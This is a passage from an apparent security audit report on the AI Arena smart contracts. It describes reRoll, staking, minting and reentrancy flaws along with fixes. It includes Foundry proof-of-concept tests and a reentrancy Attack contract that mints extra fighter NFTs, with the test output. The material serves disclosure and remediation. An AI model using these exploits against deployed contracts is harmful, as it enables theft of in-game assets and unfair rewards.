            for (uint8 i = 0; i < exceededLimit; i++) {
                if (i == (maxRerolls)) {
                    // reRoll with different fighterType
                    assertEq(_fighterFarmContract.numRerolls(tokenId), maxRerolls);
                    _fighterFarmContract.reRoll(tokenId, fighterType_Dendroid);
                    assertEq(_fighterFarmContract.numRerolls(tokenId), exceededLimit);
                } else {
                    _fighterFarmContract.reRoll(tokenId, fighterType);

Check fighterType at reRoll function.

function reRoll(uint8 tokenId, uint8 fighterType) public {
    require(msg.sender == ownerOf(tokenId));
    require(numRerolls[tokenId] < maxRerollsAllowed[fighterType]);
    require(_neuronInstance.balanceOf(msg.sender) >= rerollCost, "Not enough NRN for reroll");
+   require((fighterType == 1 && fighters[tokenId].dendroidBool) || (fighterType == 0 && !fighters[tokenId].dendroidBool), "Wrong fighterType");

    _neuronInstance.approveSpender(msg.sender, rerollCost);
    bool success = _neuronInstance.transferFrom(msg.sender, treasuryAddress, rerollCost);
    if (success) {
        numRerolls[tokenId] += 1;
        uint256 dna = uint256(keccak256(abi.encode(msg.sender, tokenId, numRerolls[tokenId])));
        (uint256 element, uint256 weight, uint256 newDna) = _createFighterBase(dna, fighterType);
        fighters[tokenId].element = element;
        fighters[tokenId].weight = weight;
        fighters[tokenId].physicalAttributes = _aiArenaHelperInstance.createPhysicalAttributes(
        _tokenURIs[tokenId] = "";

raymondfam (lookout) commented:

This report covers three consequences from the same root cause of fighter type validation: 1. more re-rolls, 2. rarer attribute switch, 3. generation attribute switch, with coded POC.

brandinho (AI Arena) confirmed

hickuphh3 (judge) increased severity to High and commented:

Note: issue 212’s fix is a little more elegant.

AI Arena mitigated:

Status: Mitigation confirmed. Full details in reports from niser93, d3e4, and fnanni.

[H-05] Malicious user can stake an amount which causes zero curStakeAtRisk on a loss but equal rewardPoints to a fair user on a win

Submitted by t0x1c, also found by Aamir, peanuts (1, 2), YouCrossTheLineAlfie, ubermensch, d3e4, shaka, alexxander, CodeWasp, 0xDetermination, evmboi32, Honour, DarkTower, ni8mare, Blank_Space, McToady (1, 2), neocrao, PedroZurdo, ZanyBonzy, VAD37, DanielArmstrong, 14si2o_Flint (1, 2), forkforkdog, MidgarAudits, n0kto, Krace, MrPotatoMagic, 0xAadi, 0xBinChook, immeas, btk (1, 2), forgebyola, aslanbek, Draiakoo (1, 2), petro_1912, ktg, israeladelaja, 0xCiphky, Merulez99, swizz, 0rpse, Silvermist, ubl4nk (1, 2), dimulski, erosjohn (1, 2), fnanni, yotov721, Abdessamed, djxploit, csanuragjain (1, 2), Kalogerone, shaflow2, WoolCentaur, Tychai0s, handsomegiraffe, AC000123, VrONTg (1, 2, 3), okolicodes, Velislav4o, and juancito

The _getStakingFactor() function rounds-up the stakingFactor_ to one if its zero. Additionally, the _addResultPoints() function rounds-down the curStakeAtRisk.
Whenever a player loses and has no accumulated reward points, 0.1% of his staked amount is considered “at risk” and transferred to the _stakeAtRiskAddress. However due to the above calculation styles, he can stake just 1 wei of NRN to have zero curStakeAtRisk in case of a loss and in case of a win, still gain the same amount of reward points as a player staking 4e18-1 wei of NRN.

Let’s look at three cases of a player with ELO as 1500:

Case Staked NRN stakingFactor calculated by the protocol Reward Points accumulated in case of a WIN NRNs lost (stake at risk) in case of a LOSS
1 4 2 1500 0.004
2 3.999999999999999999 1 750 0.003999999999999999
3 0.000000000000000001 1 750 0

As can be seen in Case2 vs Case3, a player staking 0.000000000000000001 NRN (1 wei) has the same upside in case of a win as a player staking 3.999999999999999999 NRN (4e18-1 wei) while their downside is 0.

Proof of Concept

Add the following test inside test/RankedBattle.t.sol and run via forge test -vv --mt test_t0x1c_UpdateBattleRecord_SmallStake to see the ouput under the 3 different cases:

    function test_t0x1c_UpdateBattleRecord_SmallStake() public {
        address player = vm.addr(3);
        uint8 tokenId = 0;
        // snapshot the current state
        uint256 snapshot0 = vm.snapshot();

        _rankedBattleContract.stakeNRN(4e18, 0);

        console.log("\n\n==================================== CASE 1 ==========================================================");
        emit log_named_decimal_uint("Stats when staked amount =", 4e18, 18);

        // snapshot the current state
        uint256 snapshot0_1 = vm.snapshot();

        _rankedBattleContract.updateBattleRecord(0, 50, 0, 1500, true); // if player had won
        (uint256 wins,,) = _rankedBattleContract.fighterBattleRecord(tokenId);
        assertEq(wins, 1);

        console.log("\n----------------------------------  IF WON  ---------------------------------------------------");
        console.log("accumulatedPointsPerFighter =:", _rankedBattleContract.accumulatedPointsPerFighter(0, 0));
        emit log_named_decimal_uint("getStakeAtRisk =", _stakeAtRiskContract.getStakeAtRisk(tokenId), 18);
        emit log_named_decimal_uint("_rankedBattleContract NRN balance =", _neuronContract.balanceOf(address(_rankedBattleContract)), 18);
        emit log_named_decimal_uint("_stakeAtRiskContract NRN balance =", _neuronContract.balanceOf(address(_stakeAtRiskContract)), 18);

        // Restore to snapshot state

        _rankedBattleContract.updateBattleRecord(0, 50, 2, 1500, true); // if player had lost
        (,, uint256 losses) = _rankedBattleContract.fighterBattleRecord(tokenId);
        assertEq(losses, 1);

        console.log("\n----------------------------------  IF LOST  ---------------------------------------------------");
        console.log("accumulatedPointsPerFighter =", _rankedBattleContract.accumulatedPointsPerFighter(0, 0));
        emit log_named_decimal_uint("getStakeAtRisk =", _stakeAtRiskContract.getStakeAtRisk(tokenId), 18);
        emit log_named_decimal_uint("_rankedBattleContract NRN balance =", _neuronContract.balanceOf(address(_rankedBattleContract)), 18);
        emit log_named_decimal_uint("_stakeAtRiskContract NRN balance =", _neuronContract.balanceOf(address(_stakeAtRiskContract)), 18);

        // Restore to snapshot state

        _rankedBattleContract.stakeNRN(4e18-1, 0);

        console.log("\n\n==================================== CASE 2 ==========================================================");
        emit log_named_decimal_uint("Stats when staked amount =", 4e18-1, 18);

        // snapshot the current state
        uint256 snapshot1_1 = vm.snapshot();

        _rankedBattleContract.updateBattleRecord(0, 50, 0, 1500, true); // if player had won
        (wins,,) = _rankedBattleContract.fighterBattleRecord(tokenId);
        assertEq(wins, 1);

        console.log("\n----------------------------------  IF WON  ---------------------------------------------------");
        console.log("accumulatedPointsPerFighter =:", _rankedBattleContract.accumulatedPointsPerFighter(0, 0));
        emit log_named_decimal_uint("getStakeAtRisk =", _stakeAtRiskContract.getStakeAtRisk(tokenId), 18);
        emit log_named_decimal_uint("_rankedBattleContract NRN balance =", _neuronContract.balanceOf(address(_rankedBattleContract)), 18);
        emit log_named_decimal_uint("_stakeAtRiskContract NRN balance =", _neuronContract.balanceOf(address(_stakeAtRiskContract)), 18);

        // Restore to snapshot state

        _rankedBattleContract.updateBattleRecord(0, 50, 2, 1500, true); // if player had lost
        (,, losses) = _rankedBattleContract.fighterBattleRecord(tokenId);
        assertEq(losses, 1);

        console.log("\n----------------------------------  IF LOST  ---------------------------------------------------");
        console.log("accumulatedPointsPerFighter =", _rankedBattleContract.accumulatedPointsPerFighter(0, 0));
        emit log_named_decimal_uint("getStakeAtRisk =", _stakeAtRiskContract.getStakeAtRisk(tokenId), 18);
        emit log_named_decimal_uint("_rankedBattleContract NRN balance =", _neuronContract.balanceOf(address(_rankedBattleContract)), 18);
        emit log_named_decimal_uint("_stakeAtRiskContract NRN balance =", _neuronContract.balanceOf(address(_stakeAtRiskContract)), 18);

        // Restore to snapshot state

        _rankedBattleContract.stakeNRN(1, 0);

        console.log("\n\n==================================== CASE 3 ==========================================================");
        emit log_named_decimal_uint("Stats when staked amount =", 1, 18);

        // snapshot the current state
        uint256 snapshot2_1 = vm.snapshot();

        _rankedBattleContract.updateBattleRecord(0, 50, 0, 1500, true); // if player had won
        (wins,,) = _rankedBattleContract.fighterBattleRecord(tokenId);
        assertEq(wins, 1);

        console.log("\n----------------------------------  IF WON  ---------------------------------------------------");
        console.log("accumulatedPointsPerFighter =:", _rankedBattleContract.accumulatedPointsPerFighter(0, 0));
        emit log_named_decimal_uint("getStakeAtRisk =", _stakeAtRiskContract.getStakeAtRisk(tokenId), 18);
        emit log_named_decimal_uint("_rankedBattleContract NRN balance =", _neuronContract.balanceOf(address(_rankedBattleContract)), 18);
        emit log_named_decimal_uint("_stakeAtRiskContract NRN balance =", _neuronContract.balanceOf(address(_stakeAtRiskContract)), 18);

        // Restore to snapshot state

        _rankedBattleContract.updateBattleRecord(0, 50, 2, 1500, true); // if player had lost
        (,, losses) = _rankedBattleContract.fighterBattleRecord(tokenId);
        assertEq(losses, 1);

        console.log("\n----------------------------------  IF LOST  ---------------------------------------------------");
        console.log("accumulatedPointsPerFighter =", _rankedBattleContract.accumulatedPointsPerFighter(0, 0));
        emit log_named_decimal_uint("getStakeAtRisk =", _stakeAtRiskContract.getStakeAtRisk(tokenId), 18);
        emit log_named_decimal_uint("_rankedBattleContract NRN balance =", _neuronContract.balanceOf(address(_rankedBattleContract)), 18);
        emit log_named_decimal_uint("_stakeAtRiskContract NRN balance =", _neuronContract.balanceOf(address(_stakeAtRiskContract)), 18);


==================================== CASE 1 ==========================================================
  Stats when staked amount =: 4.000000000000000000

----------------------------------  IF WON  ---------------------------------------------------
  accumulatedPointsPerFighter =: 1500
  getStakeAtRisk =: 0.000000000000000000
  _rankedBattleContract NRN balance =: 4.000000000000000000
  _stakeAtRiskContract NRN balance =: 0.000000000000000000

----------------------------------  IF LOST  ---------------------------------------------------
  accumulatedPointsPerFighter = 0
  getStakeAtRisk =: 0.004000000000000000
  _rankedBattleContract NRN balance =: 3.996000000000000000
  _stakeAtRiskContract NRN balance =: 0.004000000000000000

==================================== CASE 2 ==========================================================
  Stats when staked amount =: 3.999999999999999999

----------------------------------  IF WON  ---------------------------------------------------
  accumulatedPointsPerFighter =: 750
  getStakeAtRisk =: 0.000000000000000000
  _rankedBattleContract NRN balance =: 3.999999999999999999
  _stakeAtRiskContract NRN balance =: 0.000000000000000000

----------------------------------  IF LOST  ---------------------------------------------------
  accumulatedPointsPerFighter = 0
  getStakeAtRisk =: 0.003999999999999999
  _rankedBattleContract NRN balance =: 3.996000000000000000
  _stakeAtRiskContract NRN balance =: 0.003999999999999999

==================================== CASE 3 ==========================================================
  Stats when staked amount =: 0.000000000000000001

----------------------------------  IF WON  ---------------------------------------------------
  accumulatedPointsPerFighter =: 750
  getStakeAtRisk =: 0.000000000000000000
  _rankedBattleContract NRN balance =: 0.000000000000000001
  _stakeAtRiskContract NRN balance =: 0.000000000000000000

----------------------------------  IF LOST  ---------------------------------------------------
  accumulatedPointsPerFighter = 0
  getStakeAtRisk =: 0.000000000000000000
  _rankedBattleContract NRN balance =: 0.000000000000000001
  _stakeAtRiskContract NRN balance =: 0.000000000000000000

Tools used


Protocol can choose to set a minimum stake amount of 4 NRN (4e18 wei). One needs to take care that even after a partial unstake, this amount is not allowed to go below 4 NRN.
Also, do not round up stakingFactor_ i.e. remove L530-L532. An additional check can be added too which ensures that stakingFactor_ is greater than zero:

  File: src/RankedBattle.sol

  519:              function _getStakingFactor(
  520:                  uint256 tokenId, 
  521:                  uint256 stakeAtRisk
  522:              ) 
  523:                  private 
  524:                  view 
  525:                  returns (uint256) 
  526:              {
  527:                uint256 stakingFactor_ = FixedPointMathLib.sqrt(
  528:                    (amountStaked[tokenId] + stakeAtRisk) / 10**18
  529:                );
- 530:                if (stakingFactor_ == 0) {
- 531:                  stakingFactor_ = 1;
- 532:                }
+ 532:                require(stakingFactor_ > 0, "stakingFactor_ = 0");
  533:                return stakingFactor_;
  534:              }    

The above fixes would ensure that curStakeAtRisk can never be gamed to 0 while still having a positive reward potential.
It’s may also be a good idea to have a provision to return any “extra” staked amount. For example, if only 4 NRN is required to achieve a stakingFactor of 1 and the player stakes 4.5 NRN, then the extra 0.5 NRN could be returned. This however is up to the protocol to consider.

raymondfam (lookout) commented:

Strategic dodging to avoid penalty. Might as well fully unstake to make curStakeAtRisk 0. However, points would be zero if at risk penalty were to kick in.

hickuphh3 (judge) increased severity to High

[H-06] FighterFarm::reRoll won’t work for nft id greater than 255 due to input limited to uint8

Submitted by abhishek_thaku_r, also found by pontifex, Fulum, 0xDetermination, Greed, givn, stakog, offside0011, maxim371, ktg, alexzoid, immeas, sashik_eth, korok, Draiakoo, MrPotatoMagic, PoeAudits, Tychai0s, ahmedaghadi, kartik_giri_47538, iamandreiski, fnanni, 0xAlix2, klau5, dimulski, 0xShitgem, yotov721, kiqo, and swizz

FighterFarm::reRoll uses uint8 for nft id as input, which will stop people calling this function who owns id greater than 255. It will lead to not being able to use the reRoll to get random traits, which could have been better for there game performance.

Proof of Concept

Affect code can be seen here.

Adding code snippet below as well, for better clarity:

    /// @notice Rolls a new fighter with random traits.
    /// @param tokenId ID of the fighter being re-rolled.
    /// @param fighterType The fighter type.
@>    function reRoll(uint8 tokenId, uint8 fighterType) public {
        require(msg.sender == ownerOf(tokenId));
        require(numRerolls[tokenId] < maxRerollsAllowed[fighterType]);
        require(_neuronInstance.balanceOf(msg.sender) >= rerollCost, "Not enough NRN for reroll");

        _neuronInstance.approveSpender(msg.sender, rerollCost);
        bool success = _neuronInstance.transferFrom(msg.sender, treasuryAddress, rerollCost);
        if (success) {
            numRerolls[tokenId] += 1;
            uint256 dna = uint256(keccak256(abi.encode(msg.sender, tokenId, numRerolls[tokenId])));
            (uint256 element, uint256 weight, uint256 newDna) = _createFighterBase(dna, fighterType);
            fighters[tokenId].element = element;
            fighters[tokenId].weight = weight;
            fighters[tokenId].physicalAttributes = _aiArenaHelperInstance.createPhysicalAttributes(
            _tokenURIs[tokenId] = "";

If you notice the highlighted line (first line of function), it takes uint8 as input for tokenId parameter. Which will restrict users to call this function when they own nft id greater than 255.

Value will go out of bounds when user will input 256 or more.

Use uint256 for nft id input to fix the issue.

- function reRoll(uint8 tokenId, uint8 fighterType) public {
+ function reRoll(uint256 tokenId, uint8 fighterType) public {
   require(msg.sender == ownerOf(tokenId));
        require(numRerolls[tokenId] < maxRerollsAllowed[fighterType]);
        require(_neuronInstance.balanceOf(msg.sender) >= rerollCost, "Not enough NRN for reroll");

        _neuronInstance.approveSpender(msg.sender, rerollCost);
        bool success = _neuronInstance.transferFrom(msg.sender, treasuryAddress, rerollCost);
        if (success) {
            numRerolls[tokenId] += 1;
            uint256 dna = uint256(keccak256(abi.encode(msg.sender, tokenId, numRerolls[tokenId])));
            (uint256 element, uint256 weight, uint256 newDna) = _createFighterBase(dna, fighterType);
            fighters[tokenId].element = element;
            fighters[tokenId].weight = weight;
            fighters[tokenId].physicalAttributes = _aiArenaHelperInstance.createPhysicalAttributes(
            _tokenURIs[tokenId] = "";

raymondfam (lookout) commented:

Unsigned integer type limitation indeed.

brandinho (AI Arena) confirmed

AI Arena mitigated:

Fixed reRoll for fighters with tokenIds greater than 255.

Status: Mitigation confirmed. Full details in reports from niser93, d3e4, and fnanni.

[H-07] Fighters cannot be minted after the initial generation due to uninitialized numElements mapping

Submitted by haxatron, also found by visualbits, vnavascues, sandy, shaka, alexxander, evmboi32, DarkTower, VAD37, 0xStriker, DanielArmstrong (1, 2), 14si2o_Flint, MidgarAudits, Ryonen, KupiaSec, Topmark, 0xmystery, AgileJune, immeas, MrPotatoMagic, sashik_eth, soliditywala, nuthan2x, 0xaghas, merlinboii, VrONTg, Krace, ke1caM, Draiakoo, petro_1912, PoeAudits, ktg, 0xCiphky, Tychai0s, EagleSecurity, lil_eth, 0xvj, _eperezok, pkqs90, pynschon, peter, Aamir, sl1, 0xAlix2, fnanni, alexzoid, blutorque, cartlex_, Giorgio, radin100, klau5, t0x1c, WoolCentaur, jesjupyter, aslanbek, SpicyMeatball, 0xbranded, Varun_05, d3e4, juancito, 0xlamide, Aymen0909, btk, devblixt, and ubl4nk

In FighterFarm.sol there is a mapping numElements which stores the number of possible types of elements a fighter can have in a generation:


    /// @notice Mapping of number elements by generation.
    mapping(uint8 => uint8) public numElements;

But the problem here is that only the initial generation, Generation 0, is initialized to 3, in the numElements mapping during the constructor of FighterFarm.sol.


    /// @notice Sets the owner address, the delegated address.
    /// @param ownerAddress Address of contract deployer.
    /// @param delegatedAddress Address of delegated signer for messages.
    /// @param treasuryAddress_ Community treasury address.
    constructor(address ownerAddress, address delegatedAddress, address treasuryAddress_)
        ERC721("AI Arena Fighter", "FTR")
        _ownerAddress = ownerAddress;
        _delegatedAddress = delegatedAddress;
        treasuryAddress = treasuryAddress_;
        numElements[0] = 3;

It is therefore not possible to write to the numElements mapping for any other generations. As they are uninitialized, numElements[i] = 0 when i != 0

Moreover, this numElements mapping is read from when creating a fighter.


    /// @notice Creates the base attributes for the fighter.
    /// @param dna The dna of the fighter.
    /// @param fighterType The type of the fighter.
    /// @return Attributes of the new fighter: element, weight, and dna.
    function _createFighterBase(
        uint256 dna, 
        uint8 fighterType
        returns (uint256, uint256, uint256) 
=>      uint256 element = dna % numElements[generation[fighterType]]; // numElements is 0 when generation[fighterType] != 0.
        uint256 weight = dna % 31 + 65;
        uint256 newDna = fighterType == 0 ? dna : uint256(fighterType);
        return (element, weight, newDna);

Therefore if the protocol updates to a new generation of fighters, it will not be able to create anymore new fighters as numElements[generation[fighterType]] will be uninitialized and therefore equal 0. This will cause the transaction to always revert as any modulo by 0 will cause a panic according to Solidity Docs

Modulo with zero causes a Panic error. This check can not be disabled through unchecked { … }.

Allow the admin to update the numElements mapping when a new generation is created.

raymondfam (lookout) commented:

Missing numElements[generation[fighterType]] setter.

brandinho (AI Arena) confirmed

AI Arena mitigated:

Status: Mitigation confirmed. Full details in reports from niser93, d3e4, and fnanni.

[H-08] Player can mint more fighter NFTs during claim of rewards by leveraging reentrancy on the claimRewards() function

Submitted by DarkTower, also found by alexxander, 0brxce, BoRonGod, 0xDetermination, evmboi32, grearlake, PedroZurdo, BARW, sl1, Krace, Zac, Tricko, Aymen0909, immeas, rouhsamad, sashik_eth, ke1caM, 0xCiphky, MrPotatoMagic, jnforja, 0xBinChook, web3pwn, 0xLogos, bhilare_, Kow, ubl4nk, zxriptor, djxploit, solmaxis69, klau5, haxatron, and ZanyBonzy

When a fighting round ends, winners for the current round get picked and allocated respective rewards. These rewards are fighter NFTs that can be claimed by such winners. When you claim your rewards for a round or several rounds, the numRoundsClaimed state variable which stores the number of rounds you’ve claimed for gets updated to reflect your claim and each winner can only ever claim up to the amounts they win for each given round. That means if you try to batch-claim for two given rounds for which you won 2 fighter NFTs, your NFT count after the claim should be whatever your current balance of NFT is plus 2 fighter NFTs.

The issue here is that there’s a way to mint additional fighter NFTs on top of the fighter NFTs you’re owed for winning even though the claimRewards function has implemented a decent system to prevent over-claims. For one, it’s relatively complex to spoof a call pretending to be the _mergingPoolAddress to mint but a malicious user doesn’t need to worry too much about that to mint more fighters; they just need to leverage using a smart contract for engineering a simple reentrancy.

Proof of Concept

Consider this call path that allows a malicious user to reach this undesired state:

  1. In-session fight round gets finalized.
  2. An admin picks winners for the just finalized round.
  3. Alice, one of the winners is entitled to 2 fighter NFTs just like Bob and decides to claim rewards for the rounds she participated in but keep in mind she joined the game with a smart contract.
  4. Alice calls claimRewards supplying the args (string[] calldata modelURIs, string[] calldata modelTypes, uint256[2][] calldata customAttributes)
  5. Those are valid arguments, hence the loop proceeds to make 2 NFT mints to her address.
  6. Her address, being a smart contract manages to reenter the call to mint additional NFTs.
  7. Alice ends up with more fighter NFTs instead of 2. Bob, who is an EOA gets the 2 NFTs he’s owed but Alice has managed to gain more.

The root cause of this issue stems from the roundId. The amount of times you can reenter the claimRewards function depends on the roundId. So let’s say the roundId is 3, it mints 6 NFTs:

  • First loop mints once
  • Reenter mints the second time
  • Reenter again mints the third time
  • Cannot reenter anymore
  • Control is released so the call goes back to the second loop & finishes the mint
  • Call goes back & finishes the second and third mint
  • Alice or malicious caller ends up with 6 NFTs instead of 3

Here’s a POC to show one such attack path in the code Place the code in the MergingPool.t.sol test contract and do the setup: testReenterPOC is the attack POC test

Attack contract:

import "@openzeppelin/contracts/token/ERC721/IERC721Receiver.sol";
contract Attack is IERC721Receiver {
    address owner;
    uint256 tickets = 0;
    MergingPool mergingPool;
    FighterFarm fighterFarm;

    constructor(address mergingPool_, address fighterFarm_) {
        mergingPool = MergingPool(mergingPool_);
        fighterFarm = FighterFarm(fighterFarm_);
        owner = msg.sender;
    function reenter() internal {
        if (tickets < 100) {
            (string[] memory _modelURIs, string[] memory _modelTypes, uint256[2][] memory _customAttributes) = setInformation();
            mergingPool.claimRewards(_modelURIs, _modelTypes, _customAttributes);

    function onERC721Received(address, address, uint256 tokenId, bytes calldata) public returns (bytes4) {
        return IERC721Receiver.onERC721Received.selector;
    function attack() public {
        (string[] memory _modelURIs, string[] memory _modelTypes, uint256[2][] memory _customAttributes) = setInformation();
        mergingPool.claimRewards(_modelURIs, _modelTypes, _customAttributes);

    function setInformation() public pure returns (string[] memory, string[] memory, uint256[2][] memory) {
        string[] memory _modelURIs = new string[](3);
        _modelURIs[0] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";
        _modelURIs[1] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";
        _modelURIs[2] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";
        string[] memory _modelTypes = new string[](3);
        _modelTypes[0] = "original";
        _modelTypes[1] = "original";
        _modelTypes[2] = "original";
        uint256[2][] memory _customAttributes = new uint256[2][](3);
        _customAttributes[0][0] = uint256(1);
        _customAttributes[0][1] = uint256(80);
        _customAttributes[1][0] = uint256(1);
        _customAttributes[1][1] = uint256(80);
        _customAttributes[2][0] = uint256(1);
        _customAttributes[2][1] = uint256(80);

        return (_modelURIs, _modelTypes, _customAttributes);
    function testReenterPOC() public {

        address Bob = makeAddr("Bob");
        Attack attacker = new Attack(address(_mergingPoolContract), address(_fighterFarmContract));

        assertEq(_fighterFarmContract.ownerOf(0), address(attacker));
        assertEq(_fighterFarmContract.ownerOf(1), Bob);

        uint256[] memory _winners = new uint256[](2);
        _winners[0] = 0;
        _winners[1] = 1;

         // winners of roundId 0 are picked
        assertEq(_mergingPoolContract.isSelectionComplete(0), true);  
        assertEq(_mergingPoolContract.winnerAddresses(0, 0) == address(attacker), true);
        // winner matches ownerOf tokenId
        assertEq(_mergingPoolContract.winnerAddresses(0, 1) == Bob, true);

        string[] memory _modelURIs = new string[](2);
        _modelURIs[0] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";
        _modelURIs[1] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";
        string[] memory _modelTypes = new string[](2);
        _modelTypes[0] = "original";
        _modelTypes[1] = "original";
        uint256[2][] memory _customAttributes = new uint256[2][](2);
        _customAttributes[0][0] = uint256(1);
        _customAttributes[0][1] = uint256(80);
        _customAttributes[1][0] = uint256(1);
        _customAttributes[1][1] = uint256(80);
        // winners of roundId 1 are picked

        uint256 numberOfRounds = _mergingPoolContract.roundId();
        console.log("Number of Rounds: ", numberOfRounds);



        console.log("Balance of attacker (Alice) address pre-claim rewards: ", _fighterFarmContract.balanceOf(address(attacker)));
        // console.log("Balance of Bob address pre-claim rewards: ", _fighterFarmContract.balanceOf(Bob));

        uint256 numRewardsForAttacker = _mergingPoolContract.getUnclaimedRewards(address(attacker));
        // uint256 numRewardsForBob = _mergingPoolContract.getUnclaimedRewards(Bob);


        console.log("Number of unclaimed rewards attacker (Alice) address has a claim to: ", numRewardsForAttacker);
        // console.log("Number of unclaimed rewards Bob address has a claim to: ", numRewardsForBob);
        // vm.prank(Bob);
        // _mergingPoolContract.claimRewards(_modelURIs, _modelTypes, _customAttributes);


        uint256 balanceOfAttackerPostClaim = _fighterFarmContract.balanceOf(address(attacker));

        console.log("Balance of attacker (Alice) address post-claim rewards: ", balanceOfAttackerPostClaim);
        // console.log("Balance of Bob address post-claim rewards: ", _fighterFarmContract.balanceOf(Bob));


Malicious user leveraging reentrancy test result:

[PASS] testReenterPOC() (gas: 3999505)
  Number of Rounds:  1
  Balance of attacker (Alice) address pre-claim rewards:  1
  Number of unclaimed rewards attacker (Alice) address has a claim to:  3
  Balance of attacker (Alice) address post-claim rewards:  7

Non-malicious users test POC:

function testNormalEOAClaim() public {
        assertEq(_fighterFarmContract.ownerOf(0), _ownerAddress);
        assertEq(_fighterFarmContract.ownerOf(1), _DELEGATED_ADDRESS);

        uint256[] memory _winners = new uint256[](2);
        _winners[0] = 0;
        _winners[1] = 1;

        // winners of roundId 0 are picked
        assertEq(_mergingPoolContract.isSelectionComplete(0), true);
        assertEq(_mergingPoolContract.winnerAddresses(0, 0) == _ownerAddress, true);
        // winner matches ownerOf tokenId
        assertEq(_mergingPoolContract.winnerAddresses(0, 1) == _DELEGATED_ADDRESS, true);

        string[] memory _modelURIs = new string[](2);
        _modelURIs[0] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";
        _modelURIs[1] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";

        string[] memory _modelTypes = new string[](2);
        _modelTypes[0] = "original";
        _modelTypes[1] = "original";
        uint256[2][] memory _customAttributes = new uint256[2][](2);
        _customAttributes[0][0] = uint256(1);
        _customAttributes[0][1] = uint256(80);
        _customAttributes[1][0] = uint256(1);
        _customAttributes[1][1] = uint256(80);
        // winners of roundId 1 are picked

        uint256 numberOfRounds = _mergingPoolContract.roundId();
        console.log("Number of Rounds: ", numberOfRounds);


        console.log("Balance of owner address pre-claim rewards: ", _fighterFarmContract.balanceOf(address(this)));
        console.log("Balance of delegated address pre-claim rewards: ", _fighterFarmContract.balanceOf(_DELEGATED_ADDRESS));

        uint256 numRewardsForWinner = _mergingPoolContract.getUnclaimedRewards(_ownerAddress);
        uint256 numRewardsForDelegated = _mergingPoolContract.getUnclaimedRewards(_DELEGATED_ADDRESS);
        // emit log_uint(numRewardsForWinner);

        console.log("Number of unclaimed rewards owner address has a claim to: ", numRewardsForWinner);
        console.log("Number of unclaimed rewards delegated address has a claim to: ", numRewardsForDelegated);

        // winner claims rewards for previous roundIds
        _mergingPoolContract.claimRewards(_modelURIs, _modelTypes, _customAttributes);
        _mergingPoolContract.claimRewards(_modelURIs, _modelTypes, _customAttributes);

        console.log("Balance of owner address post-claim rewards: ", _fighterFarmContract.balanceOf(address(this)));
        console.log("Balance of delegated address post-claim rewards: ", _fighterFarmContract.balanceOf(_DELEGATED_ADDRESS));

Non-malicious users doing a normal claim result:

[PASS] testNormalEOAClaim() (gas: 2673123)
  Number of Rounds:  1
  Balance of owner address pre-claim rewards:  1
  Balance of delegated address pre-claim rewards:  1
  Number of unclaimed rewards owner address has a claim to:  2
  Number of unclaimed rewards delegated address has a claim to:  2
  Balance of owner address post-claim rewards:  3
  Balance of delegated address post-claim rewards:  3

Use a nonReentrant modifier for the claimRewards function.

brandinho (AI Arena) confirmed

AI Arena mitigated:

Status: Mitigation confirmed. Full details in reports from niser93, d3e4, and fnanni.

Medium Risk Findings (9)

[M-01] Almost all rarity rank combinations cannot be, and are not uniformly, generated

Submitted by d3e4, also found by niser93 and fnanni

Only a tiny fraction, 0.0002427%, of all rarity rank combinations are possible. The probability distribution of the possible combinations (assuming the DNA is uniformly random) is not uniform: 24% of combinations are twice as likely as the rest.

Proof of Concept

AiArenaHelper.createPhysicalAttributes() may set six finalAttributeProbabilityIndexes using the following calculation.

uint256 rarityRank = (dna / attributeToDnaDivisor[attributes[i]]) % 100;
uint256 attributeIndex = dnaToIndex(generation, rarityRank, attributes[i]);
finalAttributeProbabilityIndexes[i] = attributeIndex;

attributeToDnaDivisor is by default [2, 3, 5, 7, 11, 13]. Each rarityRank by itself is in the range 0..99, and ostensibly the total number of combinations of the six rarityRanks should then be 100^6. However, only 2,427,000 different combinations are possible, which is only 0.0002427% of all combinations that should be possible.

As a function of dna the vector of the six rarityRanks repeats every 3,003,000 integers (=2 • 3 • 5 • 7 • 11 • 13 • 100). But it turns out that 576,000 of these appear twice. For example, a dna of 0 or 1 yield the same combination of rarityRanks ([0,0,0,0,0,0]), as do 16 and 17 ([8,5,3,2,1,1]), and 22 and 23 ([11,7,4,3,2,1]), etc. That is, about 24% of the combinations are twice as likely as the rest.

The rarityRanks are input to dnaToIndex() which then will also be biased and restricted in output (depending on the attribute probabilities).

Extract multiple small random numbers by repeatedly taking the modulo and dividing. I.e.

- uint256 rarityRank = (dna / attributeToDnaDivisor[attributes[i]]) % 100;
+ uint256 rarityRank = dna % 100;
+ dna /= 100;

hickuphh3 (judge) commented:

Agree that rarityRank determination isn’t uniformly random.

[M-02] Minter / Staker / Spender roles can never be revoked

Submitted by nuthan2x, also found by 0xvj, klau5, McToady, btk, juancito, merlinboii, alexxander, sandy, favelanky, josephdara, MidgarAudits (1, 2), _eperezok, SovaSlava, lil_eth, kutugu, zaevlad, jesjupyter, shaflow2, pynschon, SpicyMeatball, 0xE1, PetarTolev, c0pp3rscr3w3r, 0xblackskull, Greed, 0xgrbr, Sabit (1, 2, 3), Tychai0s, and Timenov

From Neuron::addMinter and AccessControl::setupRole

    function addMinter(address newMinterAddress) external {
        require(msg.sender == _ownerAddress);
        _setupRole(MINTER_ROLE, newMinterAddress);

    function _setupRole(bytes32 role, address account) internal virtual {
        _grantRole(role, account);

    function _grantRole(bytes32 role, address account) internal virtual {
        if (!hasRole(role, account)) {
            _roles[role].members[account] = true;
            emit RoleGranted(role, account, _msgSender());
  • Roles of minter, staker, spender can never be revoked due to missing default admin implementation. The DEFAULT_ADMIN_ROLE = 0x00 which is default role which is admin to all the roles, and the real contract owner should own this role, since it is not granted, the owner cannot govern the roles.
  • Another wrong implemnatation is using _setupRole to grant roles intead of using _grantRole, because of the warnings in the library contract.

